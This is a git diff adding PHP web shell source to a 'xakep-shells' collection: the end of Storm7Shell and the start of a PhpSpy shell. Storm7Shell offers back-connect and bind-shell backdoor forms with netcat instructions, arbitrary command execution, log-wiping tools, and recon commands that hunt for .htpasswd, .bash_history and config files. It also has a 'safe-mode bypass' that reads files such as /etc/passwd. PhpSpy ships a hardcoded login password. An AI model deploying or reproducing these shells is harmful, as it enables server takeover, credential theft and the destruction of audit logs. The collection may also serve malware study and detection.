+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo('<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value='.$ip.'> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>First, run NetCat on your computer using \'<b>nc -l -n -v -p '.$bc_port.'</b>\'.  Then, click "Connect" once the port is listening.</center>');
+ echo $msg;
+ echo $emsg;
+}
+
+if ($act == 'shbd'){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+echo("</center>");
+} ?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td>
+<td width="50%" height="1" valign="top">
+   <center>Kernel Info: <form method="get" action="http://google.com/search"> 
+      <input name="q" type="text" size="80" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type=submit value="Google!"> 
+    </form></center> 
+</td></tr>
+</TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top"></td></tr> 
+<tr><td width="100%" height="83" valign="top">
+
+<center>
+<table border=0>
+<tr><td>
+<center>Functions</center>
+</td><td>
+<center>Make Dir</center>
+</td><td>
+<center>Go Dir</center>
+</td></tr>
+<tr><td>
+<center>
+<form action="<?php echo $surl; ?>"> 
+<input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+<SELECT NAME="act">
+<OPTION VALUE="zap2">Wipe Logs Using zap2 (*nix)
+<OPTION VALUE="miglc">Wipe Logs Using Mig-LogCleaner (*nix)
+<OPTION VALUE="clearlogs">Wipe Logs Using ClearLogs (Windows)
+</SELECT><br>
+<input type=submit name="submit" value="Execute"><br>
+&nbsp;
+</form>
+</center>
+</td><td>
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+<center>
+<input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">
+<br>
+<input type=submit value="Create"><br><?php echo $wdt; ?></form>
+</center>
+</td><td>
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls">
+<center>
+<input type="text" name="d" size="50" value="<?php echo $dispd; ?>">
+<br>
+<input type=submit value="Go"><br>
+&nbsp;
+</form>
+</center>
+</td></tr>
+<tr><td>
+<center>Aliases</center>
+</td><td>
+<center>Make File</center>
+</td><td>
+<center>Go File</center>
+</td></tr>
+<tr><td>
+<?php
+// Command-aliases 
+if (!$win) // if the box isn't windows; most likely *nix
+{ 
+ $cmdaliases = array( 
+  array('-----------------------------------------------------------', 'ls -la'),
+  array('Currently Logged in Users', 'w'),
+  array('Last User to Connect', 'lastlog'),
+  array('Find Users Without a Password', 'cut -d: -f1,2,3 /etc/passwd | grep ::'),
+  array('Is /etc Writable?', 'find /etc/ -type f -perm -o+w 2> /dev/null'),
+  array('Installed Downloaders', 'which wget curl w3m lynx'),
+  array('Open Ports', 'netstat -an | grep -i listen'),
+  array('Box Uptime', 'uptime'),
+  array('System Variables', 'set'),
+  array('ARP table', 'arp -a'),
+  array('Patch Level for RedHat 7.0', 'rpm -qa'),
+  array('Network Interfaces', 'ifconfig'),
+  array('Mounted Filesystems', 'mount'),
+  array('Find Suid Bins', 'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null'),
+  array("Find All Suid Files", "find / -type f -perm -04000 -ls"), 
+  array("Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls"), 
+  array("Find All Sgid Files", "find / -type f -perm -02000 -ls"), 
+  array("Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls"), 
+  array("Find config.inc.php Files", "find / -type f -name config.inc.php"), 
+  array("Find config* Files", "find / -type f -name \"config*\""), 
+  array("Find config* Files in Current Dir", "find . -type f -name \"config*\""), 
+  array("Find All Writable Folders and Files", "find / -perm -2 -ls"), 
+  array("Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls"), 
+  array("Find All service.pwd Files", "find / -type f -name service.pwd"), 
+  array("Find service.pwd Files in Current Dir", "find . -type f -name service.pwd"), 
+  array("Find All .htpasswd Files", "find / -type f -name .htpasswd"), 
+  array("Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd"), 
+  array("Find All .bash_history Files", "find / -type f -name .bash_history"), 
+  array("Find .bash_history Files in Current Dir", "find . -type f -name .bash_history"), 
+  array("Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc"), 
+  array("Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc"), 
+  array("List File Attributes on a Linux Second Extended File System", "lsattr -va"), 
+ ); 
+} 
+else // if the box is windows
+{ 
+ $cmdaliases = array( 
+  array('-----------------------------------------------------------', 'dir'),
+  array('Active Connections', 'netstat -an'),
+  array('ARP Table', 'arp -a'),
+  array('Net Shares', 'net use'),
+  array('IP Configuration', 'ipconfig /all'),
+  array('Disk Quotas', 'fsutil quota query '.$pd[0]),
+  array('Drive Type', 'fsutil fsinfo drivetype '.$pd[0])
+ ); 
+}
+?>
+<center><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">
+<br>
+<input type=submit name=submit value="Execute"><br>
+&nbsp;
+</form>
+</center>
+</td><td>
+<center>
+<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+<input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
+<br>
+<input type=submit value="Create"><br><?php echo $wdt; ?></form>
+</center>
+</td><td>
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+<center>
+<input type="text" name="f" size="50" value="<?php echo $dispd; ?>">
+<br>
+<input type=submit value="Go"></form>
+<br>&nbsp;
+</center>
+</td></tr>
+</table>
+</center>
+    </td></tr>
+</TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr><td width=50% height=83 valign=top>
+<center>PHP Safe-Mode Bypass (Read File)<br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+File: <input type=text name="file"> <input type=submit value="Read File">
+<br><br>
+e.g.: /etc/passwd or C:/whatev.txt
+</form>
+</center>
+<?php
+if(isset($_GET['file'])) {
+	$test='';
+	$temp=tempnam($test, 'cx');
+	$file=$_GET['file'];    
+	$get=htmlspecialchars($file);
+	echo 'Trying To Get File <font color=#000099><b>'.$get.'</b></font><br>';
+	if(copy("compress.zlib://".$file, $temp)){
+		$fichier = fopen($temp, 'r');
+		$action = fread($fichier, filesize($temp));
+		fclose($fichier);
+		$source=htmlspecialchars($action);
+		echo '<b>Start '.$get.'</b><br><br><font color=white>'.$source.'</font><br><b><br>Fin <font color=#000099>'.$get.'</font></b>';
+		unlink($temp);
+	} else
+		echo '<font color=red><center>Sorry... File <b>'.htmlspecialchars($file).'</b> dosen\'t exists or you don\'t have access.</center></font>';
+}
+?>
+</td><td width=50% height=83 valign=top> 
+<center>PHP Safe-Mode Bypass (Directory Listing)<br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+Dir: <input type=text name="directory"> <input type=submit value="List Directory">
+<br><br>
+e.g.: /etc/ or C:/
+</form>
+</center>
+<?php
+if(isset($_GET['directory'])) {
+	$chemin = $_GET['directory'];
+	$files = glob("$chemin*");
+	echo 'Trying To List Folder <font color=#000099><b>'.$chemin.'</b></font><br><br>';
+	foreach ($files as $filename)
+		echo $filename."\n<br>"; // added the \n for easier readability while viewing the html source
+}
+?>
+</td> 
+</tr></TABLE>
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><center><b>--[ Storm7Shell v<?php echo $shver; ?>, coded by sToRm</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b><br>Who said that it's better to have loved and lost?<br>I wish that I had never loved at all.</center></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/xakep-shells/PHP/2008.php.php.txt b/xakep-shells/PHP/2008.php.php.txt
new file mode 100644
index 0000000..9e68fe1
--- /dev/null
+++ b/xakep-shells/PHP/2008.php.php.txt
@@ -0,0 +1,1990 @@
+<?php
+
+/*****************************************************************************
+
+===================== ÇëÎóÓÃÓÚ·Ç·¨ÓÃ;£¬Ôì³ÉÒ»Çкó¹ûÓë±¾ÈËÎ޹ء£====================
+
+·¢²¼´Ë°æ±¾ÊÇΪÁ˼ÍÄȫÌìʹÔø¾­µÄ»Ô»Í¡£
+
+¸ÐлÄãÃÇÓëÎÒһͬ×ß¹ý£ºSniper\Super¡¤Hei\kEvin1986\saiy\wofeiwo¡£
+
+¸ÐлËùÓеÄÅóÓÑÃÇ¡¢ÐÖµÜÃÇ¡£¶àлÄãÃǵĹØÐĺÍÖ§³Ö£¡
+
+Ñ¡ÔñÔÚ1ÔÂ7ÈÕ·¢²¼ÊÇΪÁ˼ÍÄîÎÒÀÏÆŵÄÉúÈÕ£¬Ô¤×£ÎÒÔÚ±¾ÃüÄêÀï¡£ÏÌÓã·­Éí£¡
+
+====================== ×îºóԤף°²È«ÌìʹµÄÿһλÅóÓÑ·É»ÆÌÚ´ï =======================
+
+Codz by angel(4ngel)
+
+Make in China
+
+Web: http://www.4ngel.net
+
+*****************************************************************************/
+
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach(array('_GET','_POST') as $_request) {
+	foreach($$_request as $_key => $_value) {
+		if ($_key{0} != '_') {
+			if (IS_GPC) {
+				$_value = s_array($_value);
+			}
+			$$_key = $_value;
+		}
+	}
+}
+
+/*===================== ³ÌÐòÅäÖà =====================*/
+$admin = array();
+// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤, true ΪÐèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ
+$admin['check'] = true;
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë
+$admin['pass']  = 'angel';
+
+//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
+// cookie ǰ׺
+$admin['cookiepre'] = '';
+// cookie ×÷ÓÃÓò
+$admin['cookiedomain'] = '';
+// cookie ×÷Ó÷¾¶
+$admin['cookiepath'] = '/';
+// cookie ÓÐЧÆÚ
+$admin['cookielife'] = 86400;
+/*===================== ÅäÖýáÊø =====================*/
+
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if ($action == "logout") {
+	scookie('phpspypass', '', -86400 * 365);
+	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+	exit;
+}
+if($admin['check']) {
+	if ($doing == 'login') {
+		if ($admin['pass'] == $password) {
+			scookie('phpspypass', $password);
+			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+			exit;
+		}
